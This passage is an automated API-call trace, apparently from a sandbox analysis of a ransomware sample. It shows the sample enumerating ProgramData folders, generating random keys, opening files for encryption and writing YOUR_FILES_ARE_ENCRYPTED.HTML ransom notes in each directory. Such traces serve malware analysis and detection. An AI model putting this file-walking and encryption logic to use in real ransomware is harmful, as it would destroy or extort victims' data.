Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages") returned 91 [0109.461] GetProcessHeap () returned 0x600000 [0109.461] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0109.462] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages" [0109.462] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\*" [0109.462] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\*", lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x49704b0b, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x49704b0b, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0x49704b0b, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f17b8, dwReserved1=0x623f60, cFileName=".", cAlternateFileName="")) returned 0x6266f8 [0109.463] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x49704b0b, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x49704b0b, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0x49704b0b, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f17b8, dwReserved1=0x623f60, cFileName="..", cAlternateFileName="")) returned 1 [0109.463] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x49704b0b, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x49751224, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0x49751224, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f17b8, dwReserved1=0x623f60, cFileName="vcRuntimeAdditional_x86", cAlternateFileName="VCRUNT~1")) returned 1 [0109.463] StrStrIW (lpFirst="vcRuntimeAdditional_x86", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0109.463] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86") returned 115 [0109.463] GetProcessHeap () returned 0x600000 [0109.463] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3163dd0 [0109.464] lstrcpyW (in: lpString1=0x3163dd0, lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86" [0109.464] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\*" [0109.464] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\*", lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x49704b0b, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x49751224, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0x49751224, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d148, dwReserved1=0x63d090, cFileName=".", cAlternateFileName="")) returned 0x626cf8 [0109.465] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x49704b0b, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x49751224, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0x49751224, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d148, dwReserved1=0x63d090, cFileName="..", cAlternateFileName="")) returned 1 [0109.465] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc3166700, ftCreationTime.dwHighDateTime=0x1cf3e1e, ftLastAccessTime.dwLowDateTime=0xc3166700, ftLastAccessTime.dwHighDateTime=0x1cf3e1e, ftLastWriteTime.dwLowDateTime=0xc3166700, ftLastWriteTime.dwHighDateTime=0x1cf3e1e, nFileSizeHigh=0x0, nFileSizeLow=0x4b4520, dwReserved0=0x63d148, dwReserved1=0x63d090, cFileName="cab1.cab", cAlternateFileName="")) returned 1 [0109.465] StrStrIW (lpFirst="cab1.cab", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0109.465] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\cab1.cab") returned 124 [0109.465] PathFindExtensionW (pszPath="cab1.cab") returned=".cab" [0109.465] lstrlenW (lpString=".cab") returned 4 [0109.465] PathFindExtensionW (pszPath="cab1.cab") returned=".cab" [0109.465] SystemFunction036 (in: RandomBuffer=0x19e794, RandomBufferLength=0x20 | out: RandomBuffer=0x19e794) returned 1 [0109.465] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{f8cfeb22-a2e7-3971-9eda-4b11edefc185}v12.0.21005\\packages\\vcruntimeadditional_x86\\cab1.cab"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x308 [0109.466] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x19e7b8 | out: lpFileSize=0x19e7b8*=4932896) returned 1 [0109.466] GetProcessHeap () returned 0x600000 [0109.466] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x671348 [0109.469] wsprintfW (in: param_1=0x19e6d2, param_2="%02X" | out: param_1="7E") returned 2 [0109.469] wsprintfW (in: param_1=0x19e6d6, param_2="%02X" | out: param_1="EB") returned 2 [0109.469] wsprintfW (in: param_1=0x19e6da, param_2="%02X" | out: param_1="D4") returned 2 [0109.469] wsprintfW (in: param_1=0x19e6de, param_2="%02X" | out: param_1="DE") returned 2 [0109.469] wsprintfW (in: param_1=0x19e6e2, param_2="%02X" | out: param_1="2F") returned 2 [0109.469] wsprintfW (in: param_1=0x19e6e6, param_2="%02X" | out: param_1="62") returned 2 [0109.470] wsprintfW (in: param_1=0x19e6ea, param_2="%02X" | out: param_1="38") returned 2 [0109.470] wsprintfW (in: param_1=0x19e6ee, param_2="%02X" | out: param_1="17") returned 2 [0109.470] wsprintfW (in: param_1=0x19e6f2, param_2="%02X" | out: param_1="6B") returned 2 [0109.470] wsprintfW (in: param_1=0x19e6f6, param_2="%02X" | out: param_1="D6") returned 2 [0109.470] wsprintfW (in: param_1=0x19e6fa, param_2="%02X" | out: param_1="03") returned 2 [0109.470] wsprintfW (in: param_1=0x19e6fe, param_2="%02X" | out: param_1="5C") returned 2 [0109.470] wsprintfW (in: param_1=0x19e702, param_2="%02X" | out: param_1="99") returned 2 [0109.470] wsprintfW (in: param_1=0x19e706, param_2="%02X" | out: param_1="2F") returned 2 [0109.470] wsprintfW (in: param_1=0x19e70a, param_2="%02X" | out: param_1="BD") returned 2 [0109.470] wsprintfW (in: param_1=0x19e70e, param_2="%02X" | out: param_1="D0") returned 2 [0109.470] wsprintfW (in: param_1=0x19e712, param_2="%02X" | out: param_1="8F") returned 2 [0109.470] wsprintfW (in: param_1=0x19e716, param_2="%02X" | out: param_1="9F") returned 2 [0109.470] wsprintfW (in: param_1=0x19e71a, param_2="%02X" | out: param_1="5E") returned 2 [0109.470] wsprintfW (in: param_1=0x19e71e, param_2="%02X" | out: param_1="C6") returned 2 [0109.470] wsprintfW (in: param_1=0x19e722, param_2="%02X" | out: param_1="F8") returned 2 [0109.470] wsprintfW (in: param_1=0x19e726, param_2="%02X" | out: param_1="0B") returned 2 [0109.470] wsprintfW (in: param_1=0x19e72a, param_2="%02X" | out: param_1="25") returned 2 [0109.470] wsprintfW (in: param_1=0x19e72e, param_2="%02X" | out: param_1="A6") returned 2 [0109.470] wsprintfW (in: param_1=0x19e732, param_2="%02X" | out: param_1="81") returned 2 [0109.470] wsprintfW (in: param_1=0x19e736, param_2="%02X" | out: param_1="12") returned 2 [0109.470] wsprintfW (in: param_1=0x19e73a, param_2="%02X" | out: param_1="5C") returned 2 [0109.470] wsprintfW (in: param_1=0x19e73e, param_2="%02X" | out: param_1="27") returned 2 [0109.470] wsprintfW (in: param_1=0x19e742, param_2="%02X" | out: param_1="06") returned 2 [0109.470] wsprintfW (in: param_1=0x19e746, param_2="%02X" | out: param_1="CD") returned 2 [0109.470] wsprintfW (in: param_1=0x19e74a, param_2="%02X" | out: param_1="CD") returned 2 [0109.470] wsprintfW (in: param_1=0x19e74e, param_2="%02X" | out: param_1="5D") returned 2 [0109.473] lstrcpyW (in: lpString1=0x6813fc, lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\cab1.cab" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\cab1.cab") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\cab1.cab" [0109.473] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x274, CompletionKey=0x671348, NumberOfConcurrentThreads=0x0) returned 0x274 [0109.473] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x671348, lpOverlapped=0x671348) returned 1 [0109.473] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbf82e000, ftCreationTime.dwHighDateTime=0x1cf3e1e, ftLastAccessTime.dwLowDateTime=0xbf82e000, ftLastAccessTime.dwHighDateTime=0x1cf3e1e, ftLastWriteTime.dwLowDateTime=0xbf82e000, ftLastWriteTime.dwHighDateTime=0x1cf3e1e, nFileSizeHigh=0x0, nFileSizeLow=0x23000, dwReserved0=0x63d148, dwReserved1=0x63d090, cFileName="vc_runtimeAdditional_x86.msi", cAlternateFileName="VC_RUN~1.MSI")) returned 1 [0109.473] StrStrIW (lpFirst="vc_runtimeAdditional_x86.msi", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0109.473] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi") returned 144 [0109.506] PathFindExtensionW (pszPath="vc_runtimeAdditional_x86.msi") returned=".msi" [0109.506] lstrlenW (lpString=".msi") returned 4 [0109.506] PathFindExtensionW (pszPath="vc_runtimeAdditional_x86.msi") returned=".msi" [0109.506] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbf82e000, ftCreationTime.dwHighDateTime=0x1cf3e1e, ftLastAccessTime.dwLowDateTime=0xbf82e000, ftLastAccessTime.dwHighDateTime=0x1cf3e1e, ftLastWriteTime.dwLowDateTime=0xbf82e000, ftLastWriteTime.dwHighDateTime=0x1cf3e1e, nFileSizeHigh=0x0, nFileSizeLow=0x23000, dwReserved0=0x63d148, dwReserved1=0x63d090, cFileName="vc_runtimeAdditional_x86.msi", cAlternateFileName="VC_RUN~1.MSI")) returned 0 [0109.506] FindClose (in: hFindFile=0x626cf8 | out: hFindFile=0x626cf8) returned 1 [0109.509] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 145 [0109.509] GetProcessHeap () returned 0x600000 [0109.509] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x315b018 [0109.509] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\package cache\\{f8cfeb22-a2e7-3971-9eda-4b11edefc185}v12.0.21005\\packages\\vcruntimeadditional_x86\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0109.544] WriteFile (in: hFile=0x32c, lpBuffer=0x315b018*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19eab8, lpOverlapped=0x0 | out: lpBuffer=0x315b018*, lpNumberOfBytesWritten=0x19eab8*=0x3c00, lpOverlapped=0x0) returned 1 [0109.545] CloseHandle (hObject=0x32c) returned 1 [0109.546] GetProcessHeap () returned 0x600000 [0109.546] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x315b018 | out: hHeap=0x600000) returned 1 [0109.546] GetProcessHeap () returned 0x600000 [0109.546] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3163dd0 | out: hHeap=0x600000) returned 1 [0109.547] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x49704b0b, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x49751224, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0x49751224, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f17b8, dwReserved1=0x623f60, cFileName="vcRuntimeAdditional_x86", cAlternateFileName="VCRUNT~1")) returned 0 [0109.547] FindClose (in: hFindFile=0x6266f8 | out: hFindFile=0x6266f8) returned 1 [0109.548] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 121 [0109.548] GetProcessHeap () returned 0x600000 [0109.548] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x315b018 [0109.548] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\package cache\\{f8cfeb22-a2e7-3971-9eda-4b11edefc185}v12.0.21005\\packages\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x30c [0109.548] WriteFile (in: hFile=0x30c, lpBuffer=0x315b018*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19edcc, lpOverlapped=0x0 | out: lpBuffer=0x315b018*, lpNumberOfBytesWritten=0x19edcc*=0x3c00, lpOverlapped=0x0) returned 1 [0109.549] CloseHandle (hObject=0x30c) returned 1 [0109.550] GetProcessHeap () returned 0x600000 [0109.550] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x315b018 | out: hHeap=0x600000) returned 1 [0109.550] GetProcessHeap () returned 0x600000 [0109.550] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0109.551] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x49704b0b, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x49704b0b, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0x49704b0b, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x623f9a, dwReserved1=0x623f58, cFileName="packages", cAlternateFileName="")) returned 0 [0109.551] FindClose (in: hFindFile=0x626bb8 | out: hFindFile=0x626bb8) returned 1 [0109.551] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 112 [0109.551] GetProcessHeap () returned 0x600000 [0109.551] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x314b010 [0109.551] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\package cache\\{f8cfeb22-a2e7-3971-9eda-4b11edefc185}v12.0.21005\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x314 [0109.552] WriteFile (in: hFile=0x314, lpBuffer=0x314b010*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19f0e0, lpOverlapped=0x0 | out: lpBuffer=0x314b010*, lpNumberOfBytesWritten=0x19f0e0*=0x3c00, lpOverlapped=0x0) returned 1 [0109.553] CloseHandle (hObject=0x314) returned 1 [0109.644] GetProcessHeap () returned 0x600000 [0109.644] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0109.644] GetProcessHeap () returned 0x600000 [0109.644] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0109.645] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x49704b0b, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x49704b0b, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0x49704b0b, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x620890, dwReserved1=0x19f200, cFileName="{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005", cAlternateFileName="{F8CFE~1.210")) returned 0 [0109.645] FindClose (in: hFindFile=0x626a38 | out: hFindFile=0x626a38) returned 1 [0109.645] wnsprintfW (in: pszDest=0x6dd4e0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 62 [0109.645] GetProcessHeap () returned 0x600000 [0109.645] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6994a0 [0109.647] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\package cache\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x300 [0109.648] WriteFile (in: hFile=0x300, lpBuffer=0x6994a0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19f3f4, lpOverlapped=0x0 | out: lpBuffer=0x6994a0*, lpNumberOfBytesWritten=0x19f3f4*=0x3c00, lpOverlapped=0x0) returned 1 [0109.649] CloseHandle (hObject=0x300) returned 1 [0109.649] GetProcessHeap () returned 0x600000 [0109.649] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6994a0 | out: hHeap=0x600000) returned 1 [0109.649] GetProcessHeap () returned 0x600000 [0109.649] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6dd4e0 | out: hHeap=0x600000) returned 1 [0109.650] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19f43c | out: lpFindFileData=0x19f43c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd78854, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x6121cfc7, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x6121cfc7, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x130, cFileName="regid.1991-06.com.microsoft", cAlternateFileName="REGID1~1.MIC")) returned 1 [0109.650] StrStrIW (lpFirst="regid.1991-06.com.microsoft", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0109.650] wnsprintfW (in: pszDest=0x660338, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\regid.1991-06.com.microsoft") returned 46 [0109.650] GetProcessHeap () returned 0x600000 [0109.650] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x6dd4e0 [0109.651] lstrcpyW (in: lpString1=0x6dd4e0, lpString2="\\\\?\\C:\\ProgramData\\regid.1991-06.com.microsoft" | out: lpString1="\\\\?\\C:\\ProgramData\\regid.1991-06.com.microsoft") returned="\\\\?\\C:\\ProgramData\\regid.1991-06.com.microsoft" [0109.651] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\regid.1991-06.com.microsoft", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\regid.1991-06.com.microsoft\\*") returned="\\\\?\\C:\\ProgramData\\regid.1991-06.com.microsoft\\*" [0109.651] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\regid.1991-06.com.microsoft\\*", lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd78854, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x6121cfc7, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x6121cfc7, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x620890, dwReserved1=0x19f200, cFileName=".", cAlternateFileName="")) returned 0x626cf8 [0109.653] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd78854, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x6121cfc7, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x6121cfc7, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x620890, dwReserved1=0x19f200, cFileName="..", cAlternateFileName="")) returned 1 [0109.653] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf73e4600, ftCreationTime.dwHighDateTime=0x1d0d7cf, ftLastAccessTime.dwLowDateTime=0x556e33d2, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xf73e4600, ftLastWriteTime.dwHighDateTime=0x1d0d7cf, nFileSizeHigh=0x0, nFileSizeLow=0x430, dwReserved0=0x620890, dwReserved1=0x19f200, cFileName="regid.1991-06.com.microsoft Office 16 Click-to-Run Extensibility Component.swidtag", cAlternateFileName="REGID1~2.SWI")) returned 1 [0109.653] StrStrIW (lpFirst="regid.1991-06.com.microsoft Office 16 Click-to-Run Extensibility Component.swidtag", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0109.653] wnsprintfW (in: pszDest=0x6dd4e0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\regid.1991-06.com.microsoft\\regid.1991-06.com.microsoft Office 16 Click-to-Run Extensibility Component.swidtag") returned 129 [0109.653] PathFindExtensionW (pszPath="regid.1991-06.com.microsoft Office 16 Click-to-Run Extensibility Component.swidtag") returned=".swidtag" [0109.653] lstrlenW (lpString=".swidtag") returned 8 [0109.653] PathFindExtensionW (pszPath="regid.1991-06.com.microsoft Office 16 Click-to-Run Extensibility Component.swidtag") returned=".swidtag" [0109.653] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x58c6200, ftCreationTime.dwHighDateTime=0x1d0d7d0, ftLastAccessTime.dwLowDateTime=0x6fc19112, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x58c6200, ftLastWriteTime.dwHighDateTime=0x1d0d7d0, nFileSizeHigh=0x0, nFileSizeLow=0x42c, dwReserved0=0x620890, dwReserved1=0x19f200, cFileName="regid.1991-06.com.microsoft Office 16 Click-to-Run Licensing Component.swidtag", cAlternateFileName="REGID1~1.SWI")) returned 1 [0109.653] StrStrIW (lpFirst="regid.1991-06.com.microsoft Office 16 Click-to-Run Licensing Component.swidtag", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0109.653] wnsprintfW (in: pszDest=0x6dd4e0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\regid.1991-06.com.microsoft\\regid.1991-06.com.microsoft Office 16 Click-to-Run Licensing Component.swidtag") returned 125 [0109.653] PathFindExtensionW (pszPath="regid.1991-06.com.microsoft Office 16 Click-to-Run 